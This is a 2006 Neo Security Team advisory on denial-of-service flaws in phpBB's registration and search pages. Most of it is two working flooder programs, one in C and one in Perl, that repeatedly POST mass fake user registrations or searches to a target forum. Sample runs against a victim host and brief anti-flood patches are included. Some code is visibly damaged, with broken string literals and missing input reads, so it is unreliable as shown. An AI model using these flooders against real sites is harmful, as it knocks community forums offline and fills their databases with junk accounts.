<<< Date Index >>>     <<< Thread Index >>>

phpBB <= 2.0.19 Multiple DoS vulnerabilities



/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® - Advisory #18 - 03/03/06
--------------------------------------------------------
Program: phpBB
Homepage: http://www.phpbb.com
Vulnerable Versions: All phpBB versions
Risk: High Risk!!
Impact: Multiple DoS Vulnerabilities.

-==phpBB Multiple DoS Vulnerabilities ==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

- Tested
---------------------------------------------------------
many forums

- Explotation
---------------------------------------------------------
profile.php << By registering as many users as you can. The registration has to 
ve deactived the security code image.
search.php << by searching in a way that the db couln't observe it.

This vulnerability has discovered in the version 2.0.15 but it works in all 
versions if the security image code is not activ
ated. The exploits used were published some months ago, you can check it out in 
www.neosecurityteam.net

- Exploit
---------------------------------------------------------
[C Source]
/*
Name: NsT-phpBBDoS
Copyright: NeoSecurityteam
Author: HaCkZaTaN
Date: 19/06/05
Description: xD You must figure out the problem xD

root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c
root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN
[+] NeoSecurityTeam
[+] Dos has begun....[+]

[*] Use: ./NsT-phpBBDoS
[*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com
root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php 
Victimshost.com
[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]
[+] NeoSecurityTeam [+]
[+] Dos has begun....[+]

.................................
root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"
Let see how many users I have created
root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE
MACHTYPE=i486-slackware-linux-gnu
root@NeoSecurity:/home/hackzatan#

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#else
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif

#define __USE_GNU
#define _XOPEN_SOURCE

int Connection(char *, int);
void Write_In(int , char *, char *, char *, int);
char Use(char *);

int main(int argc, char *argv[])
{
int sock, x = 0;
char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];

puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN [+]");
puts("[+] NeoSecurityTeam [+]");
puts("[+] Dos has begun....[+]
");
fflush(stdout);

if(argc != 4) Use(argv[0]);

while(1)
{
sock = Connection(Host,80);
Write_In(sock, Path, Pro_Sea, Host, x);
#ifndef WIN32
shutdown(sock, SHUT_WR);
close(sock);
#else
closesocket(sock);
WSACleanup();
#endif
Pro_Sea = argv[2];
x++;
}
//I don't think that it will get here =)

return 0;
}

int Connection(char *Host, int Port)
{
#ifndef WIN32
#define SOCKET int
#else
int error;
WSADATA wsadata;
error = WSAStartup(MAKEWORD(2, 2), &wsadata);

if (error == SOCKET_ERROR)
{
perror("Could Not Start Up Winsock!
");
return;
}

#endif

SOCKET sockfd;
struct sockaddr_in sin;
struct in_addr *myaddr;
struct hostent *h;

if(Port <= 0 || Port > 65535)
{
puts("[-] Invalid Port Number
");
fflush(stdout);
exit(-1);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket() ");
fflush (stdout);
exit(-1);
}

if(isalpha(Host[0]))
{
if((h = gethostbyname(Host)) == NULL)
{
perror("gethostbyname() ");
fflush (stdout);
exit(-1);
}
}
else
{
myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
myaddr->s_addr=inet_addr(Host);

if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)
{
perror("gethostbyaddr() ");
fflush (stdout);
exit(-1);
}
}

memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(Port);
memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);

if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)
{
perror("connect() ");
exit (-1);
}

return sockfd;
}

void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)
{
char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);
char NsT[] = "x4Ex65x6Fx53x65x63x75x72x69x74x79x54x65x61x6D";
char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) 
Gecko/20050511 Firefox/1.0.4
"
"Accept: */*
"
"Accept-Language: en-us
"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
"
"Accept encoding: gzip,deflate
"
"Keep-Alive: 300
"
"Proxy-Connection: keep-alive
"
"Content-Type: application/x-www-form-urlencoded
"
"Cache-Control: no-cache
"
"Pragma: no-cache
";
char *Profile = 
".net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=spanish&style=4&timezone=1&dateformat=l%2C+d+F+Y%2C+H%3Ai&mode=register&agreed=true&coppa=0&submit=Enviar
";
char *Search = 
"&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200
";

if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, 
"username=N1sT__%d&email=N1sT__%d%%40%s%s", x, x, NsT, Profile);
else if(strcmp("search.php", Pro_Sea) == 0)
{
Pro_Sea = "search.php?mode=results";
sprintf(str1, "search_keywords=Nst_%d%s", x, Search);
}
else
{
puts("Sorry. Try making the right choice");
exit(-1);
}

sprintf(str2, "POST %s%s HTTP/1.1
"
"Host: %s
"
"Referer: http://%s/
%s"
"Content-Length: %d

%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);

write(sock, str2, strlen(str2));
write(1, ".", 1);
fflush(stdout);
}

char Use(char *program)
{
fprintf(stderr,"[*] Use: %s
", program);
fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com
", program);
fflush(stdout);
exit(-1);
}

/*

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

*/

/* EOF */
*************************************************************************
[Perl Source]
#!/usr/bin/perl
## Name: NsT-phpBBDoS (Perl Version)
## Copyright: Neo Security Team
## Author: HaCkZaTaN
## Ported: g30rg3_x
## Date: 20/06/05
## Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x
## A Simple phpBB Registration And Search DoS Flooder.
##
## g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl
## [+]
## [+] NsT-phpBBDoS v0.2 by HaCkZaTaN
## [+] ported to Perl By g30rg3_x
## [+] Neo Security Team
## [+]
## [+] Host |without http://www.| victimshost.com
## [+] Path |example. /phpBB2/ or /| /phpBB2/
## [+] Flood Type |1=Registration 2=Search| 1
## [+] ..........................................................
## [+] ..........................................................
## [+] ..........................................................
## [+] ..............................................
## [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed
## g30rg3x@neosecurity:/home/g30rg3x# echo "Let see how many users I have 
created"

use IO::Socket;

## Initialized X
$x = 0;

## Flood Variables Provided By User
print q(
NsT-phpBBDoS v0.2 by HaCkZaTaN
ported to Perl By g30rg3_x
Neo Security Team

);
print q(Host |without http://www.| );
$host = ;
chop ($host);

print q(Path |example. /phpBB2/ or /| );
$pth = ;
chop ($pth);

print q(Flood Type |1 = Registration, 2 = Search| );
$type = ;
chop ($type);

## If Type Is Equals To 1 or Registration
if($type == 1){

## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{

## Building User in base X
$uname = "username=NsT__" . "$x";

## Building User Mail in base X
$umail = "&email=NsT__" . "$x";

## Final String to Send
$postit = 
"$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "
The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!
" unless $sock;

## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1
";
print $sock "Host: $host
";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, application/vnd.ms-excel, 
application/vnd.ms-powerpoint, application/msword, */*
";
print $sock "Referer: $host
";
print $sock "Accept-Language: en-us
";
print $sock "Content-Type: application/x-www-form-urlencoded
";
print $sock "Accept-Encoding: gzip, deflate
";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) 
Gecko/20050511 Firefox/1.0.4
";
print $sock "Connection: Keep-Alive
";
print $sock "Cache-Control: no-cache
";
print $sock "Content-Length: $lrg

";
print $sock "$postit
";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop
$x++;
}

## If Type Is Equals To 2 or Search
}
elsif ($type == 2){

## User Search Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{
## Final Search String to Send
$postit = 
"search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "
The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!
" unless $sock;

## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1
";
print $sock "Host: $host
";
print $sock "Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
";
print $sock "Referer: $host
";
print $sock "Accept-Language: en-us
";
print $sock "Content-Type: application/x-www-form-urlencoded
";
print $sock "Accept-Encoding: gzip, deflate
";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) 
Gecko/20050511 Firefox/1.0.4
";
print $sock "Connection: Keep-Alive
";
print $sock "Cache-Control: no-cache
";
print $sock "Content-Length: $lrg

";
print $sock "$postit
";
close($sock);

## Print a "." for every loop
syswrite STDOUT, ".";

## Increment X in One for every Loop
$x++;
}
}else{
## STF??? What Do You Type
die "Option not Allowed O_o???
";
}

- Solutions
--------------------------------------------------------
/* Patch by Paisterist. Put this code after the "// Get current date" line */
phpBB2/includes/usercp_register.php
-usercp_register.php-
###
$flood=time()-120;
$query=$db->sql_query("Select user_regdate from " . USERS_TABLE . " where 
user_regdate>='" . $flood . "' order by user_regdate desc");
if($db->sql_numrows($query)!=0)
{
$row=$db->sql_fetchrow($query);
$error=TRUE;
$error_msg="Protección anti flood activada. Por favor espera " . $flood - 
$row['user_regdate'] . " segundos y manda los datos de vuelta.";
}
else
{
-usercp_register.php-

===================================
/* Patch by Paisterist. Put this code after "// Define initial vars" */
phpBB2/search.php
-search.php-
if ($_GET['mode']=="results")
{
############
$fp=fopen("time.txt", "r");
$flood=fgets($fp, 1000);
if($flood>=time()-5)
{
message_die(GENERAL_MESSAGE, "Protección anti flood activada. Intenta unos 
segundos más tarde");
fclose($fp);
exit(0);
}
else
{
$fp=fopen("time.txt", "w");
fwrite($fp, time());
fclose($fp);
}
######
-search.php-

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=18

- Credits
-------------------------------------------------
[C Exploit] by HaCkZaTaN
[Perl Exploit] by g30rg3_x
[Patch] by Paisterist

[N]eo [S]ecurity [T]eam [NST]® - http://www.neosecurityteam.net/

Got Questions? http://www.neosecurityteam.net/foro/

irc.fullnetwork.org #nst [NeoSecurity IRC]

- Greets
--------------------------------------------------------
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns
T0wn3r
All Internal Fear Staff

Argentina, Mexico, Colombia, Chile, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */